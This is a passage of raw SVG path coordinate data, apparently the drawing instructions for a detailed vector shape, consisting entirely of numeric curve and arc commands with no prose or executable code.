1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.